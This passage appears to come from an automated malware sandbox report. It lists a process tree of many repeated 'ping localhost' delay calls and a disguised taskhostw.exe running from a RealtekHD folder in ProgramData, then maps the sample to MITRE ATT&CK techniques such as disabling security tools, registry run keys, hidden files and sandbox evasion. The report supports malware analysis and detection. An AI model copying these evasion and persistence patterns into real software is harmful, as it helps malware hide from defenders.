      ping -n 1 localhost
      4⤵
      PID:2232
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4136
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:556
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2896
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:936
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:220
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3208
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4432
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1684
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2368
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:948
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4348
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5116
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4752
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1288
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1344
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5040
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4396
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5092
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2860
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:224
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2816
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4376
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1960
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1728
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4428
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2496
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1588
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:520
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1092
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4132
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4596
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1688
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:424
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1144
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3396
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:368
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3084
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1668
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3392
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2160
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:804
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2724
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1172
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2212
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1500
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1096
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4404
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4624
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4024
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1532
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4968
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3816
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2640
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2448
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5040
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4396
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5092
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2860
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2428
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:384
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1640
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2060
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:928
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4376
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1676
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3456
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2172
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4464
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2504
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3804
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2288
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2200
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5004

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:3956

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
PID:2220

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Impair Defenses

T1562

Modify Registry

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery